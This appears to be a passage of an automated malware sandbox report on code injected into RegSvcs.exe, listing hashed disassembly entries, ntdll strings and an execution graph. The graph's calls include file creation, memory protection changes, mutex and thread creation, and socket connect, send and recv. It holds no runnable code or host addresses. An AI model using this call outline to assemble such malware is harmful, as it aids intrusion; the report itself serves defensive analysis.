                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: 4f00396a7581efd740256f51102065756b57a4a131483d08ec1c032ea7abd85c
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 0b450f754dd96cfdbd322ee60896200c5322174817f8281b088e01860f2b6ecb
                                              • Instruction ID: 67d2005273c0282909edc3c3e98392c9f65a920e48fe720e6bf49e11633b2d82
                                              • Opcode Fuzzy Hash: 0b450f754dd96cfdbd322ee60896200c5322174817f8281b088e01860f2b6ecb
                                              • Instruction Fuzzy Hash: FF51EAB6E00216BFCB50DF688890A7EFBB8BB48301B54C17AF859D7641D734DE44A7A1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 4384f83fef5f6b532e7365c9b915abcf009399ea22c24f49c04b9292358ff2c9
                                              • Instruction ID: 084e95e203f54696bb115e49afb26b54b566aabf5c965d63a0a57fc8322b0eea
                                              • Opcode Fuzzy Hash: 4384f83fef5f6b532e7365c9b915abcf009399ea22c24f49c04b9292358ff2c9
                                              • Instruction Fuzzy Hash: D1512571A00645AECB74DE6DCC809BFB7F8EB44300B188459E5D6D7682EA74EE00AF60
                                              Strings
                                              • Execute=1, xrefs: 00F74713
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00F74655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00F74787
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00F74742
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00F74725
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00F746FC
                                              • ExecuteOptions, xrefs: 00F746A0
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 3b23a94ca0918bb148a76af96116a12674cca92f736f43420849955961c7fa02
                                              • Instruction ID: 0e8b0a8fce8a41025080070406bd27752778e62d50d6821f22c19f764ba996ab
                                              • Opcode Fuzzy Hash: 3b23a94ca0918bb148a76af96116a12674cca92f736f43420849955961c7fa02
                                              • Instruction Fuzzy Hash: 545109B1A0471D7ADF20BBA4DC96FAD77A8AF04320F1400A9E505E71D1D770AE45EF51
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction ID: bd6bf28d8b0a95ac3776862fb4fbf948394e84fcf67350d4d5084f978becae61
                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction Fuzzy Hash: F5022671508341AFC305DF18C890A6BBBE6EFC8714F188A2EF9858B365DB35E905DB52
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: 908ad82164cbefe469f2af98a2125a15d2d56027ec5e7926b277fb96fc36d8a5
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: 7381B070E052499EDF248F68C8917FEBFB6AF85320F194259EC51A7293C734D841EB50
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              • Opcode ID: 3f0d81f0c5db4125d75c06c45c1e48e97b1909b6e209b3ee74d2fcf061ea723b
                                              • Instruction ID: e1c9c35440ccae63203bba975d95fec1009a7b945995356d5db2116fd7335210
                                              • Opcode Fuzzy Hash: 3f0d81f0c5db4125d75c06c45c1e48e97b1909b6e209b3ee74d2fcf061ea723b
                                              • Instruction Fuzzy Hash: ED215376E00119ABCB50DF79CC41AFEBBE8AF54754F440116FD05E3241EB349A06ABA1
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F702BD
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F702E7
                                              • RTL: Re-Waiting, xrefs: 00F7031E
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: 54f5a9dab107ff509005c7aaabff04c64167b34661e67772c372f3ad01271f3d
                                              • Instruction ID: e8b87948c578eb8bd8f494fb643da0ab6da7b5a3026cfc6f47fcfc9a209cda3b
                                              • Opcode Fuzzy Hash: 54f5a9dab107ff509005c7aaabff04c64167b34661e67772c372f3ad01271f3d
                                              • Instruction Fuzzy Hash: CEE1AE31A14741DFD724CF28D885B2ABBF0AF44724F244A3AF5958B2E1DB74D948EB42
                                              Strings
                                              • RTL: Resource at %p, xrefs: 00F77B8E
                                              • RTL: Re-Waiting, xrefs: 00F77BAC
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00F77B7F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: 81a1910711bf663be861918b07b890d94b3fa3d8927a32749faa336c6c4bcaef
                                              • Instruction ID: 419f34f93b1b6dedf4f917fa50acc6437e3d2993f43aeb5e7b6b8a993c91fe64
                                              • Opcode Fuzzy Hash: 81a1910711bf663be861918b07b890d94b3fa3d8927a32749faa336c6c4bcaef
                                              • Instruction Fuzzy Hash: D641D6317047029FC724DE29CC51B6AB7E5EF88731F100A2DFA5ADB681DB71E805AB91
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F7728C
                                              Strings
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00F77294
                                              • RTL: Resource at %p, xrefs: 00F772A3
                                              • RTL: Re-Waiting, xrefs: 00F772C1
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: fd91988d02103d46662afaf03e4fea4cce19b79647ef92395c24f0b511e10e60
                                              • Instruction ID: 2507bcd1f737b30c67b45241d36dcc4588193e27ddec6949f1b8ff2dc2af9ab4
                                              • Opcode Fuzzy Hash: fd91988d02103d46662afaf03e4fea4cce19b79647ef92395c24f0b511e10e60
                                              • Instruction Fuzzy Hash: E241F432B04316ABC710EE25CC41F66B7A5FF44720F10462AF959EB282DB20E806EBD1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 084453dba63033a9b29e5cb3656031805b4cdedd3781cbeb30b3f3e6144af6a0
                                              • Instruction ID: 1a2727b14094d0045476b1f0a907e54d82f69a1624e249f63fa8db34771776c8
                                              • Opcode Fuzzy Hash: 084453dba63033a9b29e5cb3656031805b4cdedd3781cbeb30b3f3e6144af6a0
                                              • Instruction Fuzzy Hash: 70318072A002199FCB60DF29CC41BEEB7F8EB44750F580556E849E3241EB34AE45AFA0
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction ID: 2b1681794f836c88a74e1651e4ef3148f8e8913cf51b19dde9a37ad39078d141
                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction Fuzzy Hash: 1E91C271E083069ADF24EE69C8816BEBFB5EF44330F24461AEC51E72C0EB349D45A790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$@
                                              • API String ID: 0-1194432280
                                              • Opcode ID: 7d8847976c202190ae2fb793f6c4885ed4b5e38ecb752efe0578bafdd5c83c40
                                              • Instruction ID: cf93dca042b6333e74f3edfd5a4d617a88fbfb0c5baef02a2fa79872dd9c2a40
                                              • Opcode Fuzzy Hash: 7d8847976c202190ae2fb793f6c4885ed4b5e38ecb752efe0578bafdd5c83c40
                                              • Instruction Fuzzy Hash: 06812C72D052699BDB31DF54CC45BEEB7B8AF08710F0441EAA909B7281E7745E84EFA0
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F8CFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_ed0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4_w@4_w
                                              • API String ID: 4062629308-713214301
                                              • Opcode ID: c03953dad14a911ea6ea3953b2e56c2987d70530eff1876fff1203aad84996f8
                                              • Instruction ID: c849f05704b35c02997f265fcf773a706111ac696b6c39269b39fd93216de921
                                              • Opcode Fuzzy Hash: c03953dad14a911ea6ea3953b2e56c2987d70530eff1876fff1203aad84996f8
                                              • Instruction Fuzzy Hash: 50417F71900218DFCB21EFA5DC41AADBBB8EF44B10F10412AFA15EB2A5D734D941EBA1

                                              Execution Graph

                                              Execution Coverage:2.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:448
                                              Total number of Limit Nodes:15
                                              execution_graph 13477 101d62dd 13478 101d631a 13477->13478 13479 101d63fa 13478->13479 13480 101d6328 SleepEx 13478->13480 13484 101e0f12 13478->13484 13493 101d7432 13478->13493 13503 101d60f2 13478->13503 13480->13478 13480->13480 13487 101e0f48 13484->13487 13485 101e1134 13485->13478 13486 101e10e9 13488 101e1125 13486->13488 13521 101e0842 13486->13521 13487->13485 13487->13486 13492 101e1232 NtCreateFile 13487->13492 13509 101e1f82 13487->13509 13529 101e0922 13488->13529 13492->13487 13494 101d745b 13493->13494 13502 101d74c9 13493->13502 13495 101e1232 NtCreateFile 13494->13495 13494->13502 13496 101d7496 13495->13496 13497 101d74c5 13496->13497 13550 101d7082 13496->13550 13499 101e1232 NtCreateFile 13497->13499 13497->13502 13499->13502 13500 101d74b6 13500->13497 13559 101d6f52 13500->13559 13502->13478 13504 101d6109 13503->13504 13508 101d61d3 13503->13508 13564 101d6012 13504->13564 13506 101d6113 13507 101e1f82 6 API calls 13506->13507 13506->13508 13507->13508 13508->13478 13510 101e1fb8 13509->13510 13513 101e2081 13510->13513 13520 101e2022 13510->13520 13537 101de5b2 13510->13537 13512 101e2134 13516 101e21b2 13512->13516 13512->13520 13540 101de732 13512->13540 13513->13512 13515 101e2117 getaddrinfo 13513->13515 13513->13520 13515->13512 13516->13520 13543 101de6b2 13516->13543 13518 101e27f4 setsockopt recv 13518->13520 13519 101e2729 13519->13518 13519->13520 13520->13487 13522 101e086d 13521->13522 13546 101e1232 13522->13546 13524 101e0906 13524->13486 13525 101e0888 13525->13524 13526 101e1f82 6 API calls 13525->13526 13527 101e08c5 13525->13527 13526->13527 13527->13524 13528 101e1232 NtCreateFile 13527->13528 13528->13524 13530 101e09c2 13529->13530 13531 101e1232 NtCreateFile 13530->13531 13535 101e09d6 13531->13535 13532 101e0a9f 13532->13485 13533 101e0a5d 13533->13532 13534 101e1232 NtCreateFile 13533->13534 13534->13532 13535->13532 13535->13533 13536 101e1f82 6 API calls 13535->13536 13536->13533 13538 101de5ec 13537->13538 13539 101de60a socket 13537->13539 13538->13539 13539->13513 13541 101de788 connect 13540->13541 13542 101de76a 13540->13542 13541->13516 13542->13541 13544 101de705 send 13543->13544 13545 101de6e7 13543->13545 13544->13519 13545->13544 13547 101e1334 13546->13547 13549 101e125c 13546->13549 13547->13525 13548 101e1410 NtCreateFile 13548->13547 13549->13547 13549->13548 13551 101d7420 13550->13551 13552 101d70aa 13550->13552 13551->13500 13552->13551 13553 101e1232 NtCreateFile 13552->13553 13555 101d71f9 13553->13555 13554 101d73df 13554->13500 13555->13554 13556 101e1232 NtCreateFile 13555->13556 13557 101d73c9 13556->13557 13558 101e1232 NtCreateFile 13557->13558 13558->13554 13560 101d6f70 13559->13560 13561 101d6f84 13559->13561 13560->13497 13562 101e1232 NtCreateFile 13561->13562 13563 101d7046 13562->13563 13563->13497 13565 101d6031 13564->13565 13566 101d60cd 13565->13566 13567 101e1f82 6 API calls 13565->13567 13566->13506 13567->13566 13815 101d9edd 13817 101d9f06 13815->13817 13816 101d9fa4 13817->13816 13818 101d68f2 NtProtectVirtualMemory 13817->13818 13819 101d9f9c 13818->13819 13820 101dd382 ObtainUserAgentString 13819->13820 13820->13816 13740 101e3a1f 13741 101e3a25 13740->13741 13744 101d75f2 13741->13744 13743 101e3a3d 13745 101d760e 13744->13745 13746 101d75fb 13744->13746 13745->13743 13746->13745 13748 101dc662 13746->13748 13749 101dc66b 13748->13749 13757 101dc7ba 13748->13757 13750 101d60f2 6 API calls 13749->13750 13749->13757 13752 101dc6ee 13750->13752 13751 101dc750 13754 101dc83f 13751->13754 13755 101dc791 13751->13755 13751->13757 13752->13751 13753 101e1f82 6 API calls 13752->13753 13753->13751 13756 101e1f82 6 API calls 13754->13756 13754->13757 13755->13757 13758 101e1f82 6 API calls 13755->13758 13756->13757 13757->13745 13758->13757 13951 101d9dd9 13953 101d9df0 13951->13953 13952 101d9ecd 13953->13952 13954 101dd382 ObtainUserAgentString 13953->13954 13954->13952 13821 101dbcd4 13823 101dbcd8 13821->13823 13822 101dc022 13823->13822 13827 101db352 13823->13827 13825 101dbf0d 13825->13822 13836 101db792 13825->13836 13829 101db39e 13827->13829 13828 101db58e 13828->13825 13829->13828 13830 101db4ec 13829->13830 13832 101db595 13829->13832 13831 101e1232 NtCreateFile 13830->13831 13834 101db4ff 13831->13834 13832->13828 13833 101e1232 NtCreateFile 13832->13833 13833->13828 13834->13828 13835 101e1232 NtCreateFile 13834->13835 13835->13828 13837 101db7e0 13836->13837 13838 101e1232 NtCreateFile 13837->13838 13840 101db90c 13838->13840 13839 101dbaf3 13839->13825 13840->13839 13841 101db352 NtCreateFile 13840->13841 13842 101db602 NtCreateFile 13840->13842 13841->13840 13842->13840 13716 101e2e12 13717 101e1942 13716->13717 13718 101e2e45 NtProtectVirtualMemory 13717->13718 13719 101e2e70 13718->13719 13759 101d7613 13760 101d7620 13759->13760 13761 101d7684 13760->13761 13762 101e2e12 NtProtectVirtualMemory 13760->13762 13762->13760 13787 101e3a4d 13788 101e3a53 13787->13788 13791 101d7782 13788->13791 13790 101e3a6b 13793 101d778f 13791->13793 13792 101d77ad 13792->13790 13793->13792 13794 101dc662 6 API calls 13793->13794 13794->13792 13763 101e2e0a 13764 101e2e45 NtProtectVirtualMemory 13763->13764 13765 101e1942 13763->13765 13766 101e2e70 13764->13766 13765->13764 13890 101db14a 13891 101db153 13890->13891 13895 101db174 13890->13895 13893 101dd382 ObtainUserAgentString 13891->13893 13892 101db1e7 13894 101db16c 13893->13894 13896 101d60f2 6 API calls 13894->13896 13895->13892 13898 101d61f2 13895->13898 13896->13895 13899 101d620f 13898->13899 13903 101d62c9 13898->13903 13901 101d6242 13899->13901 13902 101e0f12 7 API calls 13899->13902 13900 101d6289 13900->13903 13905 101d60f2 6 API calls 13900->13905 13901->13900 13904 101d7432 NtCreateFile 13901->13904 13902->13901 13903->13895 13904->13900 13905->13903 13724 101e1f82 13725 101e1fb8 13724->13725 13726 101de5b2 socket 13725->13726 13728 101e2081 13725->13728 13735 101e2022 13725->13735 13726->13728 13727 101e2134 13729 101de732 connect 13727->13729 13731 101e21b2 13727->13731 13727->13735 13728->13727 13730 101e2117 getaddrinfo 13728->13730 13728->13735 13729->13731 13730->13727 13732 101de6b2 send 13731->13732 13731->13735 13734 101e2729 13732->13734 13733 101e27f4 setsockopt recv 13733->13735 13734->13733 13734->13735 13926 101d9fbf 13927 101da016 13926->13927 13930 101da0f0 13927->13930 13931 101d68f2 NtProtectVirtualMemory 13927->13931 13932 101da0bb 13927->13932 13928 101da0e8 13929 101dd382 ObtainUserAgentString 13928->13929 13929->13930 13931->13932 13932->13928 13933 101d68f2 NtProtectVirtualMemory 13932->13933 13933->13928 13795 101dc8be 13796 101dc8c3 13795->13796 13797 101dc9a6 13796->13797 13798 101dc995 ObtainUserAgentString 13796->13798 13798->13797 13906 101dd37e 13907 101dd3c7 13906->13907 13908 101dd232 ObtainUserAgentString 13907->13908 13909 101dd438 13908->13909 13909->13909 13767 101e083a 13768 101e0841 13767->13768 13769 101e1f82 6 API calls 13768->13769 13771 101e08c5 13769->13771 13770 101e0906 13771->13770 13772 101e1232 NtCreateFile 13771->13772 13772->13770 13799 101de0b9 13800 101de0ed 13799->13800 13802 101de1f0 13799->13802 13801 101e1f82 6 API calls 13800->13801 13800->13802 13801->13802 13910 101e1f7a 13911 101e1fb8 13910->13911 13912 101de5b2 socket 13911->13912 13914 101e2081 13911->13914 13921 101e2022 13911->13921 13912->13914 13913 101e2134 13915 101de732 connect 13913->13915 13919 101e21b2 13913->13919 13913->13921 13914->13913 13916 101e2117 getaddrinfo 13914->13916 13914->13921 13915->13919 13916->13913 13917 101de6b2 send 13920 101e2729 13917->13920 13918 101e27f4 setsockopt recv 13918->13921 13919->13917 13919->13921 13920->13918 13920->13921 13843 101da0fb 13845 101da137 13843->13845 13844 101da2d5 13845->13844 13846 101d68f2 NtProtectVirtualMemory 13845->13846 13847 101da28a 13846->13847 13848 101d68f2 NtProtectVirtualMemory 13847->13848 13851 101da2a9 13848->13851 13849 101da2cd 13850 101dd382 ObtainUserAgentString 13849->13850 13850->13844 13851->13849 13852 101d68f2 NtProtectVirtualMemory 13851->13852 13852->13849 13853 101da2f4 13855 101da349 13853->13855 13854 101da49f 13856 101d68f2 NtProtectVirtualMemory 13854->13856 13860 101da4c3 13854->13860 13855->13854 13857 101d68f2 NtProtectVirtualMemory 13855->13857 13856->13860 13858 101da480 13857->13858 13859 101d68f2 NtProtectVirtualMemory 13858->13859 13859->13854 13861 101da597 13860->13861 13862 101d68f2 NtProtectVirtualMemory 13860->13862 13863 101d68f2 NtProtectVirtualMemory 13861->13863 13866 101da5bf 13861->13866 13862->13861 13863->13866 13864 101da6e1 13865 101dd382 ObtainUserAgentString 13864->13865 13868 101da6e9 13865->13868 13867 101da6b9 13866->13867 13869 101d68f2 NtProtectVirtualMemory 13866->13869 13867->13864 13870 101d68f2 NtProtectVirtualMemory 13867->13870 13869->13867 13870->13864 13720 101e1232 13721 101e1334 13720->13721 13723 101e125c 13720->13723 13722 101e1410 NtCreateFile 13722->13721 13723->13721 13723->13722 13871 101d60f1 13872 101d6109 13871->13872 13876 101d61d3 13871->13876 13873 101d6012 6 API calls 13872->13873 13874 101d6113 13873->13874 13875 101e1f82 6 API calls 13874->13875 13874->13876 13875->13876 13955 101d75f1 13956 101d760e 13955->13956 13957 101d7606 13955->13957 13958 101dc662 6 API calls 13957->13958 13958->13956 13934 101e39b3 13935 101e39bd 13934->13935 13938 101d86d2 13935->13938 13937 101e39e0 13939 101d8704 13938->13939 13940 101d86f7 13938->13940 13942 101d86ff 13939->13942 13943 101d872d 13939->13943 13945 101d8737 13939->13945 13941 101d60f2 6 API calls 13940->13941 13941->13942 13942->13937 13947 101de2c2 13943->13947 13945->13942 13946 101e1f82 6 API calls 13945->13946 13946->13942 13948 101de2df 13947->13948 13949 101de2cb 13947->13949 13948->13942 13949->13948 13950 101de0c2 6 API calls 13949->13950 13950->13948 13959 101e39f1 13960 101e39f7 13959->13960 13963 101d8852 13960->13963 13962 101e3a0f 13964 101d88e4 13963->13964 13965 101d8865 13963->13965 13964->13962 13965->13964 13967 101d8887 13965->13967 13969 101d887e 13965->13969 13966 101de36f 13966->13962 13967->13964 13968 101dc662 6 API calls 13967->13968 13968->13964 13969->13966 13970 101de0c2 6 API calls 13969->13970 13970->13966 13568 101e2bac 13569 101e2bb1 13568->13569 13602 101e2bb6 13569->13602 13603 101d8b72 13569->13603 13571 101e2c2c 13572 101e2c85 13571->13572 13574 101e2c69 13571->13574 13575 101e2c54 13571->13575 13571->13602 13573 101e0ab2 NtProtectVirtualMemory 13572->13573 13576 101e2c8d 13573->13576 13578 101e2c6e 13574->13578 13579 101e2c80 13574->13579 13577 101e0ab2 NtProtectVirtualMemory 13575->13577 13639 101da102 13576->13639 13582 101e2c5c 13577->13582 13583 101e0ab2 NtProtectVirtualMemory 13578->13583 13579->13572 13580 101e2c97 13579->13580 13584 101e2cbe 13580->13584 13589 101e2c9c 13580->13589 13625 101d9ee2 13582->13625 13586 101e2c76 13583->13586 13588 101e2cc7 13584->13588 13591 101e2cd9 13584->13591 13584->13602 13631 101d9fc2 13586->13631 13590 101e0ab2 NtProtectVirtualMemory 13588->13590 13607 101e0ab2 13589->13607 13593 101e2ccf 13590->13593 13594 101e0ab2 NtProtectVirtualMemory 13591->13594 13591->13602 13649 101da2f2 13593->13649 13597 101e2ce5 13594->13597 13667 101da712 13597->13667 13605 101d8b93 13603->13605 13604 101d8cce 13604->13571 13605->13604 13606 101d8cb5 CreateMutexW 13605->13606 13606->13604 13608 101e0adf 13607->13608 13616 101e0ebc 13608->13616 13679 101d68f2 13608->13679 13610 101e0e5c 13611 101d68f2 NtProtectVirtualMemory 13610->13611 13612 101e0e7c 13611->13612 13613 101d68f2 NtProtectVirtualMemory 13612->13613 13614 101e0e9c 13613->13614 13615 101d68f2 NtProtectVirtualMemory 13614->13615 13615->13616 13617 101d9de2 13616->13617 13618 101d9df0 13617->13618 13620 101d9ecd 13618->13620 13704 101dd382 13618->13704 13621 101d6412 13620->13621 13623 101d6440 13621->13623 13622 101d6473 13622->13602 13623->13622 13624 101d644d CreateThread 13623->13624 13624->13602 13626 101d9f06 13625->13626 13627 101d9fa4 13626->13627 13628 101d68f2 NtProtectVirtualMemory 13626->13628 13627->13602 13629 101d9f9c 13628->13629 13630 101dd382 ObtainUserAgentString 13629->13630 13630->13627 13633 101da016 13631->13633 13632 101da0f0 13632->13602 13633->13632 13636 101d68f2 NtProtectVirtualMemory 13633->13636 13637 101da0bb 13633->13637 13634 101da0e8 13635 101dd382 ObtainUserAgentString 13634->13635 13635->13632 13636->13637 13637->13634 13638 101d68f2 NtProtectVirtualMemory 13637->13638 13638->13634 13640 101da137 13639->13640 13641 101da2d5 13640->13641 13642 101d68f2 NtProtectVirtualMemory 13640->13642 13641->13602 13643 101da28a 13642->13643 13644 101d68f2 NtProtectVirtualMemory 13643->13644 13647 101da2a9 13644->13647 13645 101da2cd 13646 101dd382 ObtainUserAgentString 13645->13646 13646->13641 13647->13645 13648 101d68f2 NtProtectVirtualMemory 13647->13648 13648->13645 13650 101da349 13649->13650 13651 101da49f 13650->13651 13653 101d68f2 NtProtectVirtualMemory 13650->13653 13652 101d68f2 NtProtectVirtualMemory 13651->13652 13656 101da4c3 13651->13656 13652->13656 13654 101da480 13653->13654 13655 101d68f2 NtProtectVirtualMemory 13654->13655 13655->13651 13657 101da597 13656->13657 13658 101d68f2 NtProtectVirtualMemory 13656->13658 13659 101d68f2 NtProtectVirtualMemory 13657->13659 13662 101da5bf 13657->13662 13658->13657 13659->13662 13660 101da6e1 13661 101dd382 ObtainUserAgentString 13660->13661 13664 101da6e9 13661->13664 13663 101da6b9 13662->13663 13665 101d68f2 NtProtectVirtualMemory 13662->13665 13663->13660 13666 101d68f2 NtProtectVirtualMemory 13663->13666 13664->13602 13665->13663 13666->13660 13668 101da767 13667->13668 13669 101d68f2 NtProtectVirtualMemory 13668->13669 13672 101da903 13668->13672 13670 101da8e3 13669->13670 13671 101d68f2 NtProtectVirtualMemory 13670->13671 13671->13672 13674 101da992 13672->13674 13676 101d68f2 NtProtectVirtualMemory 13672->13676 13673 101da9b7 13675 101dd382 ObtainUserAgentString 13673->13675 13674->13673 13678 101d68f2 NtProtectVirtualMemory 13674->13678 13677 101da9bf 13675->13677 13676->13674 13677->13602 13678->13673 13680 101d6987 13679->13680 13683 101d69b2 13680->13683 13694 101d7622 13680->13694 13682 101d6c0c 13682->13610 13683->13682 13684 101d6ba2 13683->13684 13687 101d6ac5 13683->13687 13685 101e2e12 NtProtectVirtualMemory 13684->13685 13686 101d6b5b 13685->13686 13686->13682 13689 101e2e12 NtProtectVirtualMemory 13686->13689 13698 101e2e12 13687->13698 13689->13682 13690 101d6ae3 13690->13682 13691 101d6b3d 13690->13691 13692 101e2e12 NtProtectVirtualMemory 13690->13692 13693 101e2e12 NtProtectVirtualMemory 13691->13693 13692->13691 13693->13686 13695 101d767a 13694->13695 13696 101d7684 13695->13696 13697 101e2e12 NtProtectVirtualMemory 13695->13697 13696->13683 13697->13695 13702 101e1942 13698->13702 13700 101e2e45 NtProtectVirtualMemory 13701 101e2e70 13700->13701 13701->13690 13703 101e1967 13702->13703 13703->13700 13705 101dd3c7 13704->13705 13708 101dd232 13705->13708 13707 101dd438 13707->13620 13709 101dd25e 13708->13709 13712 101dc8c2 13709->13712 13711 101dd26b 13711->13707 